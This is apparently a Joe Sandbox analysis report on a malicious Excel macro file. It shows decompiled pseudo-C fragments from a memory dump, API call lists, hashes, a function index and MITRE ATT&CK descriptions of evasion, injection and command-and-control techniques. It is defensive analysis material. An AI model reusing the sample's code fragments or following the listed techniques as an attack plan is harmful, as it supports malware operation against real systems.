				if(_t33 == 0x191 || _t42 != _t33) {
					_t2 = (0x00000191 - _t42 & _t33) + 0x383; // 0x514
					SetWindowPos(_t42, _t33, 0x191, _t33, _t33, _t33, 0x191);
					_t14 = (_t2 | 0x00000383) * 0x383;
				}
				_v20 = _t14;
				_t43 = _t42 * _t14;
				_t4 = _t43 + 0x368; // -973259
				_t28 = _t4 - _t14;
				_t37 = _t28 ^ _t43;
				_t6 = _t43 + 0x368; // -972387
				_t44 = _t37 + _t6;
				ResetEvent(_t44);
				_t29 = _t28 ^ _t44;
				_t38 = _t37 | _t29;
				_t32 = _t38 & _t44;
				_t7 = _t32 + 0x31; // -973210
				_t21 = _t7 * _t44;
				_t46 = (_t21 + _t29) * _t38;
				CreateDIBSection(_t21, _t21, _v20, _t46, _t32, _t29);
				return _t46 * _t32;
			}

0x000d29d7
0x000d29df
0x000d29e1
0x000d29e5
0x000d29f0
0x000d29f5
0x000d2a01
0x000d2a17
0x000d2a1f
0x000d2a2b
0x000d2a2b
0x000d2a31
0x000d2a34
0x000d2a37
0x000d2a3d
0x000d2a41
0x000d2a43
0x000d2a43
0x000d2a4b
0x000d2a51
0x000d2a53
0x000d2a57
0x000d2a59
0x000d2a5c
0x000d2a62
0x000d2a6f
0x000d2a81

APIs

DeleteDC.GDI32(-000EDD33), ref: 000D29E5
SetWindowPos.USER32(-000EDD33,000D7BEC,00000191,000D7BEC,000D7BEC,000D7BEC,00000191), ref: 000D2A1F
ResetEvent.KERNEL32(-000ED663,?,000D7BEC,-000F1FA0,-03E51D33,-000F1D33,?,000D9287,-000F1D33,?,000D77A1,00000001,?,-000F1D33,?,000D6A74), ref: 000D2A4B
CreateDIBSection.GDI32(-000ED99A,-000ED99A,-000ED9CB,-000ED663,-000ED9CB,-000ED9CB), ref: 000D2A6F

Memory Dump Source

Source File: 00000005.00000002.2363719901.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true

Similarity

API ID: CreateDeleteEventResetSectionWindow
String ID:
API String ID: 201249963-0
Opcode ID: a093cd7281110ba089eba81dd4ce5a35cc0e4f0637cd4220eb37b0637e46947c
Instruction ID: e58b1a1dcecc92b154da25c4f9b890a2962e8316dad6111c3e398b337ecc57c4
Opcode Fuzzy Hash: a093cd7281110ba089eba81dd4ce5a35cc0e4f0637cd4220eb37b0637e46947c
Instruction Fuzzy Hash: 24112B73B002247FE7248A5ADC49EEBBA5EE7C9710F060126F849DB251D9756F05C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 000EDA20, Relevance: 6.0, APIs: 4, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000EDA20() {
				char _v28;
				void* _t4;

				_t4 = CreateEventW(0, 1, 0, E000D7200(0xf05f8,  &_v28));
				if(_t4 != 0) {
					SetEvent(_t4);
					_t4 = CloseHandle(_t4);
				}
				SetLastError(0);
				return _t4;
			}

0x000eda3f
0x000eda47
0x000eda4c
0x000eda53
0x000eda53
0x000eda5b
0x000eda66

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0CD06773,?,-000F1D33,?,000D91EB,-000F1D33,?,000D77A1,00000001), ref: 000EDA3F
SetEvent.KERNEL32(00000000,?,?,0CD06773,?,-000F1D33,?,000D91EB,-000F1D33,?,000D77A1,00000001,?,-000F1D33,?,000D6A74), ref: 000EDA4C
CloseHandle.KERNEL32(00000000), ref: 000EDA53
SetLastError.KERNEL32(00000000,?,?,0CD06773,?,-000F1D33,?,000D91EB,-000F1D33,?,000D77A1,00000001,?,-000F1D33,?,000D6A74), ref: 000EDA5B

Memory Dump Source

Source File: 00000005.00000002.2363719901.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true

Similarity

API ID: Event$CloseCreateErrorHandleLast
String ID:
API String ID: 2055590504-0
Opcode ID: 18b84b9c3f0e78b305a43d93c7f640bc2774f4007c04a3933604b9f85e54b9d2
Instruction ID: 7f70ade641ec25971a9f433371b02680cfc4a8d1a2f18df562efc1cc10b81b5f
Opcode Fuzzy Hash: 18b84b9c3f0e78b305a43d93c7f640bc2774f4007c04a3933604b9f85e54b9d2
Instruction Fuzzy Hash: D3E04FB1684204BBF75077E56C0AFBA3A6C9B00B42F440061FB0DE9583EAA99554D7B6

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report case (1057).xls

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Initial Sample

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "case (1057).xls"

Indicators

Summary

Document Summary

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General

Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 145752

General

Macro 4.0 Code

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Function 0044AE40, Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 372
injectionmemorythreadCOMMON

Function 0045DA20, Relevance: 6.0, APIs: 4, Instructions: 27
COMMON

Function 0045D770, Relevance: 3.0, APIs: 2, Instructions: 14
COMMON

Function 0045B1B0, Relevance: 1.5, APIs: 1, Instructions: 23
memoryCOMMON

Function 004569A0, Relevance: 7.6, APIs: 5, Instructions: 65
threadprocessCOMMON

Function 0044D830, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 280
libraryloaderCOMMON

Function 00441A00, Relevance: 3.0, APIs: 2, Instructions: 32
COMMON

Function 0045DA70, Relevance: .7, Instructions: 746
COMMONCrypto

Function 00455BF0, Relevance: .3, Instructions: 307
COMMONCrypto

Function 00443A30, Relevance: .1, Instructions: 149
COMMONCrypto

Function 00449A60, Relevance: .1, Instructions: 127
COMMONCrypto

Function 00458830, Relevance: .1, Instructions: 113
COMMON

Function 00449C60, Relevance: .1, Instructions: 95
COMMONCrypto

Function 0045CE40, Relevance: .0, Instructions: 36
COMMON

Function 00452EF0, Relevance: .0, Instructions: 2
COMMON

Function 00442340, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87
registryCOMMON

Function 004446E0, Relevance: 6.1, APIs: 4, Instructions: 134
COMMON

Function 004429D0, Relevance: 6.1, APIs: 4, Instructions: 70
COMMON

Function 000E9C90, Relevance: 1.6, APIs: 1, Instructions: 107
COMMON

Function 000D1AF0, Relevance: 1.6, APIs: 1, Instructions: 100
filenetworkCOMMON

Function 000DBA60, Relevance: 6.1, APIs: 4, Instructions: 107
registryCOMMON

Function 000EBAD0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188
networkCOMMON

Function 000E1E90, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114
COMMON

Function 000DBCD0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
COMMON

Function 000E8590, Relevance: 4.6, APIs: 3, Instructions: 128
COMMON

Function 000DA5E0, Relevance: 4.6, APIs: 3, Instructions: 100
filememoryCOMMON

Function 000DABF0, Relevance: 4.6, APIs: 3, Instructions: 59
registryCOMMON

Function 000E4680, Relevance: 3.7, APIs: 2, Instructions: 710
threadCOMMON

Function 000E3BC0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132
COMMON

Function 000E5180, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74
COMMON

Function 000E9600, Relevance: 3.1, APIs: 2, Instructions: 93
fileCOMMON

Function 000EB790, Relevance: 3.1, APIs: 2, Instructions: 91
networkCOMMON

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre